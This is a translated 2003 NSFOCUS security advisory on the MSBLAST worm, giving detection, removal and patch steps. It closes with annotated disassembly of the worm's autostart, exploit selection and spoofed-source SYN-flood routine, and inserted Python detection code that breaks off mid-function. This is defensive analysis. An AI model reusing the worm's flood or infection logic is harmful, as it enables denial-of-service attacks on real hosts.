Emergency Alert
NSFOCUS Emergency Alert (Alert2003-02)

NSFOCUS Security Team (security@nsfocus.com)
http://www.nsfocus.com

MSBLAST Worm Emergency Advisory!

Release date: 2003-08-12

CVE ID:CAN-2003-0352
BUGTRAQ ID:8205

Affected software and systems:
====================
Microsoft Windows 2000
Microsoft Windows XP
Microsoft Windows 2003

Summary:
======
The NSFOCUS Security Team's honeypot has detected an active worm that exploits the MS03-026 Microsoft Windows DCOM RPC interface remote buffer overflow vulnerability. It is extremely dangerous.

Revision history:

2003-08-12  11:00  Document created
2003-08-14  11:00  Revised the solution section and added the worm code analysis

Analysis:
======
On 2003-08-12 Beijing time, the NSFOCUS Security Team's honeypot detected a new attack. The team immediately analyzed the captured samples and confirmed that this is a worm exploiting the MS03-026 Microsoft Windows DCOM RPC interface remote buffer overflow vulnerability (http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=5147). Because the vulnerability affects every Windows 2000, Windows XP and Windows 2003 system that lacks the MS03-026 patch, personal computers as well as servers, the worm is extremely dangerous.

The worm is 6176 bytes in size. It was compiled with LCC-Win32 v1.03 and packed with UPX 1.22; its creation timestamp is 2003-08-11 07:21 (time zone unknown).

After infecting a system, the worm first checks whether a mutex named "BILLY" exists. If it does, the worm exits; if not, it creates one.

The worm then adds the following value under the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:

"windows auto update"="msblast.exe"

so that the worm starts automatically every time a user logs on.

The worm also starts a tftp server on local port UDP/69, which it uses to deliver its binary, msblast.exe, to other compromised systems.

When choosing target IP addresses, the worm first picks addresses on the infected system's own subnet, then selects targets across the Internet according to a fixed algorithm.

Once a connection is established, the worm sends the exploit data to the target's TCP port 135. If the exploit succeeds, it listens on TCP port 4444 of the target as a backdoor bound to cmd.exe. The worm then connects to that port and sends a tftp command that connects back to the attacking host, transfers msblast.exe to the target, and runs it.
The exploit code carried by the worm comes from a publicly released exploit. When the attack fails, it can crash the RpcSS service on an unpatched Windows system. By default, an RpcSS crash makes Windows XP reboot automatically. The worm cannot successfully compromise Windows 2003, but it can crash the RpcSS service on Windows 2003, and, as on Windows XP, the RpcSS crash reboots the system.

When the worm finds that the current month is later than August or the day of the month is later than the 15th, it launches a SYN flood denial-of-service attack against port 80 of Microsoft's update site "windowsupdate.com". In other words, from 2003-08-16 onward the denial-of-service attack runs continuously.

The worm's code also contains the following text:

I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!

For a more detailed code analysis of the worm, see the appendix.

Solution:
==========
While the worm is spreading, every system connected to the Internet is continuously hit by attack packets. Each machine receives exploit data aimed at both Windows 2000 and Windows XP, and whenever the exploit packet does not match the operating system that receives it, the RpcSS service crashes. By default, Windows 2000 then cannot use Windows Update properly and has trouble accessing some web pages, while Windows XP and Windows 2003 reboot repeatedly. You should therefore first take some temporary measures to block the worm's attack. We recommend the following:

1. First disconnect from the network, for example by unplugging the network cable or phone line, then restart the system.

2. Keep the network disconnected. Click the "Start" menu in the lower-left corner, choose "Run", type "dcomcnfg" and click "OK"; this opens the DCOM configuration tool. (Several pop-up prompts may appear; you can click OK on all of them.)

3. On the "Default Properties" page, clear the "Enable Distributed COM on this computer" checkbox, then click "OK".

4. DCOM is now disabled and your system is no longer affected by the worm; you can reconnect to the network and proceed with the patch installation described below. If your machine is a server, it is best to re-enable DCOM after installing the patch, because we cannot know whether some applications on your system depend on DCOM. For personal users, disabling DCOM has little impact in most cases.

* Checking whether the system is infected:

   1. Check whether the file msblast.exe exists in the system's %systemroot%\system32 directory. At a command prompt, type:
      C:\>dir %systemroot%\system32\msblast.exe
      If the system is infected, you will see output similar to this:
      C:\>dir %systemroot%\system32\msblast.exe
       驱动器 C 中的卷是 sys
       卷的序列号是 A401-04A9

       C:\WINNT\system32 的目录

      2003-08-12  03:03                6,176 msblast.exe
                     1 个文件          6,176 字节
                     0 个目录  2,701,848,576 可用字节

   2. Check the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. At a command prompt, type:
      C:\>regedit /e tmp.txt HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
      C:\>type tmp.txt
      If the system is infected, you will see output similar to this:
      C:\>type tmp.txt
      Windows Registry Editor Version 5.00

      [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
      "windows auto update"="msblast.exe"

   3. In Task Manager, check whether an msblast.exe process exists. If it does, the worm is running on your system.

   4. Several new variants have appeared. They merely change the file name to penis32.exe or teekids.exe, with the registry value changed accordingly. Although their spread is still limited, they deserve attention.
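The registry check in step 2 can be automated by parsing the tmp.txt that regedit /e writes. The following Python example is added here and is not part of the advisory: it decodes such an export, collects the values under the Run key and flags the file names the advisory lists for the worm and its variants. The sample export, including its benign "Example Tray" entry, is constructed for the example.

```python
import codecs
import ntpath
import re

# File names the advisory associates with the worm and its variants.
WORM_FILE_NAMES = {"msblast.exe", "penis32.exe", "teekids.exe"}
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
# "name"=data lines of a .reg file; the name may contain escaped quotes.
_VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')


def decode_reg_export(raw: bytes) -> str:
    """regedit /e writes 'Version 5.00' exports as UTF-16 with a BOM;
    fall back to 8-bit text for older REGEDIT4-style files."""
    if raw.startswith(codecs.BOM_UTF16_LE) or raw.startswith(codecs.BOM_UTF16_BE):
        return raw.decode("utf-16")
    return raw.decode("latin-1")


def _unquote(literal: str) -> str:
    """Strip the quotes of a REG_SZ literal and undo the \\\\ and \\" escaping."""
    if len(literal) >= 2 and literal[0] == '"' and literal[-1] == '"':
        literal = literal[1:-1]
    return literal.replace('\\\\', '\\').replace('\\"', '"')


def parse_reg_export(text: str) -> dict:
    """Map each [key] in the export to its {value name: data} pairs (data as strings)."""
    keys: dict = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            keys[current][_unquote('"' + m.group(1) + '"')] = _unquote(m.group(2).strip())
    return keys


def find_worm_autostart(keys: dict) -> list:
    """Return (value name, data) pairs under the Run key whose executable is a known worm file."""
    hits = []
    for name, data in keys.get(RUN_KEY, {}).items():
        # ntpath handles Windows separators on any host; the data may be a full path.
        if ntpath.basename(data.strip().lower()) in WORM_FILE_NAMES:
            hits.append((name, data))
    return hits


def check_export(raw: bytes) -> list:
    """Full pipeline: raw export bytes -> list of suspicious Run entries."""
    return find_worm_autostart(parse_reg_export(decode_reg_export(raw)))


# Constructed sample: the export shown in the advisory plus one benign entry,
# encoded the way regedit /e writes it (UTF-16 with BOM, CRLF line endings).
SAMPLE_EXPORT = (
    "Windows Registry Editor Version 5.00\r\n"
    "\r\n"
    "[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n"
    "\"windows auto update\"=\"msblast.exe\"\r\n"
    "\"Example Tray\"=\"C:\\\\Program Files\\\\Example\\\\tray.exe\"\r\n"
).encode("utf-16")

if __name__ == "__main__":
    for name, data in check_export(SAMPLE_EXPORT):
        print("suspicious Run entry: %r = %r" % (name, data))
```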

* Removing the worm

   If you find that the system is already infected, we recommend removing the worm manually as follows:

   1. Disable DCOM as described above.
   2. Click the "Start" menu in the lower-left corner, choose "Run", type "taskmgr" and click "OK" to open Task Manager. Find the msblast.exe process, right-click it, choose "End Process" and click "Yes".
   3. Delete msblast.exe from the system directory.
   4. Click the "Start" menu in the lower-left corner, choose "Run", type "regedit" and click "OK" to open the Registry Editor. Navigate to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and delete the value "windows auto update"="msblast.exe" under it.
   5. Restart the system.

   As of now, several antivirus vendors' signature databases include this worm and can remove it; please update your antivirus signatures and run a scan.

* Preventing infection:

   To eliminate the threat completely, you must install the security patch Microsoft provides in security bulletin MS03-026 (http://www.microsoft.com/technet/security/bulletin/MS03-026.asp).

   Download locations:

   Windows NT 4.0 Server:

   http://microsoft.com/downloads/details.aspx?FamilyId=2CC66F4E-217E-4FA7-BDBF-DF77A0B9303F&displaylang=en
   Simplified Chinese patch:
   http://download.microsoft.com/download/1/a/f/1af70395-d328-4135-86aa-cae9bb4bdec6/CHSQ823980i.EXE

   Windows NT 4.0 Terminal Server Edition :

   http://microsoft.com/downloads/details.aspx?FamilyId=6C0F0160-64FA-424C-A3C1-C9FAD2DC65CA&displaylang=en

   Windows 2000:

   http://microsoft.com/downloads/details.aspx?FamilyId=C8B8A846-F541-4C15-8C9F-220354449117&displaylang=en
   Simplified Chinese patch:
   http://download.microsoft.com/download/2/8/1/281c0df6-772b-42b0-9125-6858b759e977/Windows2000-KB823980-x86-CHS.exe

   Windows XP 32 bit Edition:

   http://microsoft.com/downloads/details.aspx?FamilyId=2354406C-C5B6-44AC-9532-3DE40F69C074&displaylang=en
   Simplified Chinese patch:
   http://download.microsoft.com/download/a/a/5/aa56d061-3a38-44af-8d48-85e42de9d2c0/WindowsXP-KB823980-x86-CHS.exe

   Windows XP 64 bit Edition:

   http://microsoft.com/downloads/details.aspx?FamilyId=1B00F5DF-4A85-488F-80E3-C347ADCC4DF1&displaylang=en

   Windows Server 2003 32 bit Edition:

   http://microsoft.com/downloads/details.aspx?FamilyId=F8E0FF3A-9F4C-4061-9009-3A212458E92E&displaylang=en
   Simplified Chinese patch:
   http://download.microsoft.com/download/0/7/9/07971669-76fc-4e69-bc4e-88837d8005d1/WindowsServer2003-KB823980-x86-CHS.exe

   Windows Server 2003 64 bit Edition:

   http://microsoft.com/downloads/details.aspx?FamilyId=2B566973-C3F0-4EC1-995F-017E35692BC7&displaylang=en

   After installing the patch you must restart the system for it to take effect. If possible, disconnect from the network after downloading the patch and before installing it.

   Note: For Windows 2000 users, this patch requires that at least SP2 is installed. If you have not yet installed SP2, we recommend installing SP4, since it also fixes many other serious security vulnerabilities.

   Download location:

   http://www.microsoft.com/Windows2000/downloads/servicepacks/sp4/download.asp

   The Simplified Chinese SP4 (129M) download location is:

   http://download.microsoft.com/download/4/1/4/4140e2e0-0ad9-4438-ac52-da0e0429c0e6/w2ksp4_cn.exe


NSFOCUS's ICEYE (冰之眼) IDS (http://www.nsfocus.com/homepage/products/nids.htm) has been able to detect this attack since the vulnerability was published (July 2003); RSAS (http://www.nsfocus.com/homepage/products/rsas.htm) has long been able to detect hosts on the network affected by this vulnerability; and for denial of service caused by large volumes of TCP traffic, Collapsar (黑洞) (http://www.nsfocus.com/homepage/products/collapsar.htm) is currently one of the best solutions.

Additional information:
==========
http://www.nsfocus.net/index.php?act=sec_bug&do=view&bug_id=5147
http://www.microsoft.com/technet/security/bulletin/MS03-026.asp

Analysis of the main MSBLAST worm code
------------------------
Author: yuyang@nsfocus.com (http://www.nsfocus.com)

;write the autostart entry into the registry
:00401250 55                      push ebp
:00401251 89E5                    mov ebp, esp
:00401253 81ECAC030000            sub esp, 000003AC
:00401259 56                      push esi
:0040125A 57                      push edi
:0040125B 31F6                    xor esi, esi
:0040125D 6A00                    push 00000000
:0040125F 8D45F8                  lea eax, dword ptr [ebp-08]
:00401262 50                      push eax
:00401263 6A00                    push 00000000
:00401265 683F000F00              push 000F003F
:0040126A 6A00                    push 00000000
:0040126C 6A00                    push 00000000
:0040126E 6A00                    push 00000000
:00401270 685D484000              push 0040485D        ;db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
:00401275 6802000080              push 80000002
:0040127A E80D110000              Call 0040238C        ;ADVAPI32.RegCreateKeyExA
:0040127F 6A32                    push 00000032
:00401281 683C404000              push 0040403C        ;db 'msblast.exe',0
:00401286 6A01                    push 00000001
:00401288 6A00                    push 00000000
:0040128A 6849484000              push 00404849        ;db 'windows auto update',0
:0040128F FF75F8                  push [ebp-08]
:00401292 E801110000              Call 00402398        ;ADVAPI32.RegSetValueExA
:00401297 FF75F8                  push [ebp-08]
:0040129A E8E1100000              Call 00402380        ;ADVAPI32.RegCloseKey
;create the mutex
:0040129F 6843484000              push 00404843        ;db 'BILLY',0
:004012A4 6A01                    push 00000001
:004012A6 6A00                    push 00000000
:004012A8 E8A3100000              Call 00402350        ;KERNEL32.CreateMutexA
……………………
;random number used to choose which payload to send
:00401476 E8BD0E0000              Call 00402338        ;KERNEL32.GetTickCount
:0040147B 50                      push eax        ;the GetTickCount output is used as the srand seed
:0040147C E8B30F0000              Call 00402434        ;CRTDLL.srand
:00401481 59                      pop ecx
:00401482 E8890F0000              Call 00402410        ;CRTDLL.rand
:00401487 B914000000              mov ecx, 00000014
:0040148C 99                      cdq
:0040148D F7F9                    idiv ecx        ;
:0040148F 83FA0C                  cmp edx, 0000000C
:00401492 7D02                    jge 00401496
:00401494 31F6                    xor esi, esi
:00401496 C7053431400001000000    mov dword ptr [00403134], 00000001
:004014A0 E86B0F0000              Call 00402410        ;CRTDLL.rand
:004014A5 B90A000000              mov ecx, 0000000A
:004014AA 99                      cdq
:004014AB F7F9                    idiv ecx
:004014AD 83FA07                  cmp edx, 00000007
:004014B0 7E0A                    jle 004014BC
:004014B2 C7053431400002000000    mov dword ptr [00403134], 00000002
……………………
:00401954 833D3431400001          cmp dword ptr [00403134], 00000001      ;compare this flag to decide whether to send the Windows 2000 or the Windows XP exploit
:0040195B 750C                    jne 00401969
:0040195D C785ECEAFFFF9D130001    mov dword ptr [ebp+FFFFEAEC], 0100139D  ;use the jump address for Windows XP
:00401967 EB0A                    jmp 00401973
:00401969 C785ECEAFFFF9F751800    mov dword ptr [ebp+FFFFEAEC], 0018759F  ;use the jump address for Windows 2000
……………………
;check the date
:004014FC 6A03                    push 00000003        ;size of buffer
:004014FE 8D45F4                  lea eax, dword ptr [ebp-0C]
:00401501 50                      push eax        ;buffer
:00401502 683C484000              push 0040483C        ;db 'd',0    get the day of the month
:00401507 6A00                    push 00000000
:00401509 6A00                    push 00000000
:0040150B 6809040000              push 00000409        ;"0409"="en-us; English (United States)"
;Judging from the Locale argument to GetDateFormatA, the author's operating system used the US locale.
:00401510 E8E70D0000              Call 004022FC        ;KERNEL32.GetDateFormatA
:00401515 6A03                    push 00000003
:00401517 8D45F0                  lea eax, dword ptr [ebp-10]
:0040151A 50                      push eax
:0040151B 683A484000              push 0040483A        ;db 'M',0    get the month
:00401520 6A00                    push 00000000
:00401522 6A00                    push 00000000
:00401524 6809040000              push 00000409
:00401529 E8CE0D0000              Call 004022FC        ;KERNEL32.GetDateFormatA
:0040152E 8D45F4                  lea eax, dword ptr [ebp-0C]
:00401531 50                      push eax
:00401532 E8790E0000              Call 004023B0        ;CRTDLL.atoi
:00401537 59                      pop ecx
:00401538 83F80F                  cmp eax, 0000000F    ;is the day greater than 15?
:0040153B 7F0F                    jg 0040154C        ;if the day is greater than 15, jump to creating the DoS thread
:0040153D 8D7DF0                  lea edi, dword ptr [ebp-10]
:00401540 57                      push edi
:00401541 E86A0E0000              Call 004023B0        ;CRTDLL.atoi
:00401546 59                      pop ecx
:00401547 83F808                  cmp eax, 00000008    ;is the month greater than 8?
:0040154A 7E16                    jle 00401562        ;if the month is greater than 8, continue below and create the DoS thread
:0040154C 8D45FC                  lea eax, dword ptr [ebp-04]
:0040154F 50                      push eax
:00401550 6A00                    push 00000000
:00401552 6A00                    push 00000000
:00401554 68C11E4000              push 00401EC1        ;DoS subroutine
:00401559 6A00                    push 00000000
:0040155B 6A00                    push 00000000
:0040155D E8120E0000              Call 00402374        ;KERNEL32.CreateThread
……………………
;address-handling subroutine; the converted result is returned in eax
:00401E8B 55                      push ebp
:00401E8C 89E5                    mov ebp, esp
:00401E8E 56                      push esi
:00401E8F 57                      push edi
:00401E90 FF7508                  push [ebp+08]
:00401E93 E8D8020000              Call 00402170        ;WS2_32.inet_addr
:00401E98 89C7                    mov edi, eax
:00401E9A 31F6                    xor esi, esi
:00401E9C 83FFFF                  cmp edi, FFFFFFFF
:00401E9F 751A                    jne 00401EBB        ;if it is already an IP address skip ahead, otherwise resolve the host name first
:00401EA1 FF7508                  push [ebp+08]
:00401EA4 E827030000              Call 004021D0        ;WS2_32.gethostbyname
:00401EA9 89C6                    mov esi, eax
:00401EAB 09F6                    or esi, esi
:00401EAD 7505                    jne 00401EB4
:00401EAF 83C8FF                  or eax, FFFFFFFF
:00401EB2 EB09                    jmp 00401EBD
:00401EB4 8B460C                  mov eax, dword ptr [esi+0C]
:00401EB7 8B00                    mov eax, dword ptr [eax]
:00401EB9 8B38                    mov edi, dword ptr [eax]
:00401EBB 89F8                    mov eax, edi
:00401EBD 5F                      pop edi
:00401EBE 5E                      pop esi
:00401EBF 5D                      pop ebp
:00401EC0 C3                      ret

;DoS subroutine
:00401EC1 55                      push ebp
:00401EC2 89E5                    mov ebp, esp
:00401EC4 51                      push ecx
:00401EC5 53                      push ebx
:00401EC6 56                      push esi
:00401EC7 57                      push edi
:00401EC8 C745FC01000000          mov [ebp-04], 00000001
:00401ECF 68EC474000              push 004047EC        ;db 'windowsupdate.com',0
:00401ED4 E8B2FFFFFF              call 00401E8B        ;address-handling subroutine
:00401ED9 59                      pop ecx
:00401EDA 89C6                    mov esi, eax        ;esi holds the resolved IP
:00401EDC 6A01                    push 00000001
:00401EDE 6A00                    push 00000000
:00401EE0 6A00                    push 00000000
:00401EE2 68FF000000              push 000000FF
:00401EE7 6A03                    push 00000003
:00401EE9 6A02                    push 00000002
:00401EEB E84C030000              Call 0040223C        ;WS2_32.WSASocketA
:00401EF0 89C7                    mov edi, eax
:00401EF2 83F8FF                  cmp eax, FFFFFFFF
:00401EF5 7504                    jne 00401EFB
:00401EF7 31C0                    xor eax, eax
:00401EF9 EB34                    jmp 00401F2F
:00401EFB 6A04                    push 00000004
:00401EFD 8D45FC                  lea eax, dword ptr [ebp-04]
:00401F00 50                      push eax
:00401F01 6A02                    push 00000002
:00401F03 6A00                    push 00000000
:00401F05 57                      push edi
:00401F06 E8AD020000              Call 004021B8        ;WS2_32.setsockopt
:00401F0B 83F8FF                  cmp eax, FFFFFFFF
:00401F0E 7504                    jne 00401F14        ;jump on success
:00401F10 31C0                    xor eax, eax
:00401F12 EB1B                    jmp 00401F2F
:00401F14 57                      push edi
:00401F15 56                      push esi
:00401F16 E81B000000              call 00401F36        ;SYN flood packet-sending function
:00401F1B 83C408                  add esp, 00000008
:00401F1E 6A14                    push 00000014
:00401F20 E837040000              Call 0040235C        ;KERNEL32.Sleep
:00401F25 EBED                    jmp 00401F14
:00401F27 57                      push edi
:00401F28 E8C7020000              Call 004021F4        ;WS2_32.closesocket
:00401F2D 31C0                    xor eax, eax
:00401F2F 5F                      pop edi
:00401F30 5E                      pop esi
:00401F31 5B                      pop ebx
:00401F32 C9                      leave
:00401F33 C20400                  ret 0004

;SYN flood packet-sending function
:00401F36 55                      push ebp
:00401F37 89E5                    mov ebp, esp
:00401F39 81EC9C000000            sub esp, 0000009C
:00401F3F 53                      push ebx
:00401F40 56                      push esi
:00401F41 57                      push edi
:00401F42 8D7D9C                  lea edi, dword ptr [ebp-64]
:00401F45 8D35B0474000            lea esi, dword ptr [004047B0]
:00401F4B B90F000000              mov ecx, 0000000F
:00401F50 F3                      repz
:00401F51 A5                      movsd
:00401F52 66C7857EFFFFFF5000      mov word ptr [ebp+FFFFFF7E], 0050
:00401F5B E8D8030000              Call 00402338        ;KERNEL32.GetTickCount
:00401F60 50                      push eax        ;the GetTickCount result is used as the srand seed
:00401F61 E8CE040000              Call 00402434        ;CRTDLL.srand
:00401F66 E8A5040000              Call 00402410        ;CRTDLL.rand
:00401F6B 898568FFFFFF            mov dword ptr [ebp+FFFFFF68], eax
:00401F71 E89A040000              Call 00402410        ;CRTDLL.rand
:00401F76 B9FF000000              mov ecx, 000000FF
:00401F7B 99                      cdq
:00401F7C F7F9                    idiv ecx
:00401F7E 52                      push edx            ;rand
:00401F7F 8BBD68FFFFFF            mov edi, dword ptr [ebp+FFFFFF68]
:00401F85 89F8                    mov eax, edi
:00401F87 B9FF000000              mov ecx, 000000FF
:00401F8C 99                      cdq
:00401F8D F7F9                    idiv ecx
:00401F8F 52                      push edx            ;rand
:00401F90 FF3538314000            push dword ptr [00403138]    ;these two addresses hold the first two bytes of the local IP
:00401F96 FF3514304000            push dword ptr [00403014]
;the SYN flood source IP is not fully random: the first two bytes are real, the last two random.
;probably because some network devices do not let packets with source IPs outside the local network go out
:00401F9C 682B484000              push 0040482B        ;db '%i.%i.%i.%i',0
:00401FA1 8DBD6EFFFFFF            lea edi, dword ptr [ebp+FFFFFF6E]
:00401FA7 57                      push edi        ;generated IP
:00401FA8 E87B040000              Call 00402428        ;CRTDLL.sprintf
:00401FAD 8D856EFFFFFF            lea eax, dword ptr [ebp+FFFFFF6E]
:00401FB3 50                      push eax
:00401FB4 E8D2FEFFFF              call 00401E8B        ;address-handling subroutine
:00401FB9 89C3                    mov ebx, eax        ;save the converted IP in ebx
;build the SYN flood packet below
:00401FBB 66C745800200            mov [ebp-80], 0002
:00401FC1 0FB7857EFFFFFF          movzx eax, word ptr [ebp+FFFFFF7E]
:00401FC8 50                      push eax
        ;destination port 80
:00401FC9 E88A010000              Call 00402158        ;WS2_32.htons
:00401FCE 89C7                    mov edi, eax
:00401FD0 66897D82                mov word ptr [ebp-7E], di
:00401FD4 8B4508                  mov eax, dword ptr [ebp+08]
:00401FD7 894584                  mov dword ptr [ebp-7C], eax
:00401FDA C645EC45                mov [ebp-14], 45
:00401FDE 6A28                    push 00000028
:00401FE0 E873010000              Call 00402158        ;WS2_32.htons
:00401FE5 89C7                    mov edi, eax
:00401FE7 66897DEE                mov word ptr [ebp-12], di
:00401FEB 66C745F00100            mov [ebp-10], 0001    ;ident
:00401FF1 66C745F20000            mov [ebp-0E], 0000    ;Fragment Offset:0
:00401FF7 C645F480                mov [ebp-0C], 80    ;TTL:128
:00401FFB C645F506                mov [ebp-0B], 06    ;Protocol:TCP
:00401FFF 66C745F60000            mov [ebp-0A], 0000
:00402005 8B4508                  mov eax, dword ptr [ebp+08]
:00402008 8945FC                  mov dword ptr [ebp-04], eax
:0040200B 0FB7857EFFFFFF          movzx eax, word ptr [ebp+FFFFFF7E]
:00402012 50                      push eax
:00402013 E840010000              Call 00402158        ;WS2_32.htons
:00402018 89C7                    mov edi, eax
:0040201A 66897DDA                mov word ptr [ebp-26], di
:0040201E 8365E000                and dword ptr [ebp-20], 00000000
:00402022 C645E450                mov [ebp-1C], 50
:00402026 C645E502                mov [ebp-1B], 02
:0040202A 6800400000              push 00004000        ;TCP Window:16384
:0040202F E824010000              Call 00402158        ;WS2_32.htons
:00402034 89C7                    mov edi, eax
:00402036 66897DE6                mov word ptr [ebp-1A], di    ;[ebp-1A]TCP Window:16384
:0040203A 66C745EA0000            mov [ebp-16], 0000
:00402040 66C745E80000            mov [ebp-18], 0000
:00402046 8B45FC                  mov eax, dword ptr [ebp-04]
:00402049 894594                  mov dword ptr [ebp-6C], eax    ;[ebp-6C] destination IP
:0040204C C6459800                mov [ebp-68], 00
:00402050 C6459906                mov [ebp-67], 06
:00402054 6A14                    push 00000014
:00402056 E8FD000000              Call 00402158        ;WS2_32.htons
:0040205B 89C7                    mov edi, eax
:0040205D 66897D9A                mov word ptr [ebp-66], di
:00402061 895DF8                  mov dword ptr [ebp-08], ebx
:00402064 E8A7030000              Call 00402410        ;CRTDLL.rand
:00402069 B9E8030000              mov ecx, 000003E8
:0040206E 99                      cdq
:0040206F F7F9                    idiv ecx
:00402071 89D7                    mov edi, edx
:00402073 81C7E8030000            add edi, 000003E8
:00402079 81E7FFFF0000            and edi, 0000FFFF
:0040207F 57                      push edi        ;randomly generated source port
:00402080 E8D3000000              Call 00402158        ;WS2_32.htons
:00402085 89C7                    mov edi, eax
:00402087 66897DD8                mov word ptr [ebp-28], di
:0040208B E880030000              Call 00402410        ;CRTDLL.rand
:00402090 898564FFFFFF            mov dword ptr [ebp+FFFFFF64], eax
:00402096 E875030000              Call 00402410        ;CRTDLL.rand    ;random seq number
:0040209B 8BBD64FFFFFF            mov edi, dword ptr [ebp+FFFFFF64]
:004020A1 C1E710                  shl edi, 10
:004020A4 09C7                    or edi, eax
:004020A6 81E7FFFF0000            and edi, 0000FFFF
:004020AC 57                      push edi
:004020AD E8A6000000              Call 00402158        ;WS2_32.htons
:004020B2 89C7                    mov edi, eax
:004020B4 81E7FFFF0000            and edi, 0000FFFF
:004020BA 897DDC                  mov dword ptr [ebp-24], edi
:004020BD 895D90                  mov dword ptr [ebp-70], ebx
:004020C0 6A0C                    push 0000000C
:004020C2 8D4590                  lea eax, dword ptr [ebp-70]
:004020C5 50                      push eax
:004020C6 8D459C                  lea eax, dword ptr [ebp-64]
:004020C9 50                      push eax
:004020CA E81D030000              Call 004023EC        ;CRTDLL.memcpy
:004020CF 6A14                    push 00000014
:004020D1 8D45D8                  lea eax, dword ptr [ebp-28]
:004020D4 50                      push eax
:004020D5 8D45A8                  lea eax, dword ptr [ebp-58]
:004020D8 50                      push eax
:004020D9 E80E030000              Call 004023EC        ;CRTDLL.memcpy
:004020DE 6A20                    push 00000020
:004020E0 8D459C                  lea eax, dword ptr [ebp-64]
:004020E3 50                      push eax
:004020E4 E857FDFFFF              call 00401E40
:004020E9 89C7                    mov edi, eax
:004020EB 66897DE8                mov word ptr [ebp-18], di
:004020EF 6A14                    push 00000014
:004020F1 8D45EC                  lea eax, dword ptr [ebp-14]
:004020F4 50                      push eax
:004020F5 8D459C                  lea eax, dword ptr [ebp-64]
:004020F8 50                      push eax
:004020F9 E8EE020000              Call 004023EC        ;CRTDLL.memcpy
:004020FE 6A14                    push 00000014
:00402100 8D45D8                  lea eax, dword ptr [ebp-28]
:00402103 50                      push eax
:00402104 8D45B0                  lea eax, dword ptr [ebp-50]    ;[ebp-50] source port
:00402107 50                      push eax
:00402108 E8DF020000              Call 004023EC        ;CRTDLL.memcpy
:0040210D 6A04                    push 00000004
:0040210F 6A00                    push 00000000
:00402111 8D45C4                  lea eax, dword ptr [ebp-3C]
:00402114 50                      push eax
:00402115 E8DE020000              Call 004023F8        ;CRTDLL.memset
:0040211A 6A28                    push 00000028
:0040211C 8D459C                  lea eax, dword ptr [ebp-64]
:0040211F 50                      push eax
:00402120 E81BFDFFFF              call 00401E40
:00402125 89C7                    mov edi, eax
:00402127 66897DF6                mov word ptr [ebp-0A], di
:0040212B 6A14                    push 00000014
:0040212D 8D45EC                  lea eax, dword ptr [ebp-14]
:00402130 50                      push eax
:00402131 8D459C                  lea eax, dword ptr [ebp-64]
:00402134 50                      push eax
:00402135 E8B2020000              Call 004023EC        ;CRTDLL.memcpy
:0040213A 83C478                  add esp, 00000078
:0040213D 6A10                    push 00000010
:0040213F 8D4580                  lea eax, dword ptr [ebp-80]
:00402142 50                      push eax
:00402143 6A00                    push 00000000
:00402145 6A28                    push 00000028
:00402147 8D459C                  lea eax, dword ptr [ebp-64]
:0040214A 50                      push eax
:0040214B FF750C                  push [ebp+0C]
:0040214E E859000000              Call 004021AC        ;WS2_32.sendto    send the packet
:00402153 5F                      pop edi
:00402154 5E                      pop esi
:00402155 5B                      pop ebx
:00402156 C9                      leave
:00402157 C3                      ret
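The SYN flood routine above fixes most header fields of every packet it sends: TTL 128, a 40-byte total length, the identification word 0x0001 stored without htons, destination port 80, a source port of 1000 + rand % 1000, the SYN flag alone and a window of 16384. The following Python example is added here and is not part of the advisory: it parses a raw IPv4/TCP header and flags packets that carry all of those values at once, which is a usable network-side detection for this flood. The two sample packets are constructed for the example (192.168.45.201 as the spoofed source with its "real" first two octets, 203.0.113.10 as a stand-in target), and the on-wire byte order of the identification field is an assumption drawn from the listing.

```python
import struct
from dataclasses import dataclass
from typing import Iterable, Optional

# Header values fixed by the SYN flood routine in the listing.
BLASTER_TTL = 0x80                       # mov [ebp-0C], 80: TTL 128
BLASTER_TOTAL_LEN = 0x28                 # htons(0x28): 40-byte packet, no payload
BLASTER_WINDOW = 0x4000                  # htons(0x4000): TCP window 16384
BLASTER_DST_PORT = 80                    # destination port 80
BLASTER_SRC_PORTS = range(1000, 2000)    # rand % 0x3E8 + 0x3E8
# The ident word 0x0001 is written with no htons, so (assumption drawn from the
# listing) the identification field reads 01 00 on the wire.
BLASTER_IP_ID_WIRE = b"\x01\x00"
TCP_SYN = 0x02


@dataclass
class HeaderSummary:
    ttl: int
    total_len: int
    ip_id_wire: bytes
    src_ip: str
    dst_ip: str
    src_port: int
    dst_port: int
    flags: int
    window: int
    ip_checksum_ok: bool


def ones_complement_checksum(data: bytes) -> int:
    """RFC 1071 checksum; evaluates to 0 over a header whose checksum field is valid."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_tcp(pkt: bytes) -> Optional[HeaderSummary]:
    """Decode the IPv4 and TCP headers of a raw IP packet; None if not IPv4/TCP."""
    if len(pkt) < 40 or pkt[0] >> 4 != 4:
        return None
    ihl = (pkt[0] & 0x0F) * 4
    if ihl < 20 or len(pkt) < ihl + 20 or pkt[9] != 6:   # protocol 6 = TCP
        return None
    src_port, dst_port, _seq, _ack, off_flags, window = struct.unpack(
        "!HHIIHH", pkt[ihl:ihl + 16])
    return HeaderSummary(
        ttl=pkt[8], total_len=struct.unpack("!H", pkt[2:4])[0], ip_id_wire=pkt[4:6],
        src_ip=".".join(str(b) for b in pkt[12:16]),
        dst_ip=".".join(str(b) for b in pkt[16:20]),
        src_port=src_port, dst_port=dst_port, flags=off_flags & 0x01FF, window=window,
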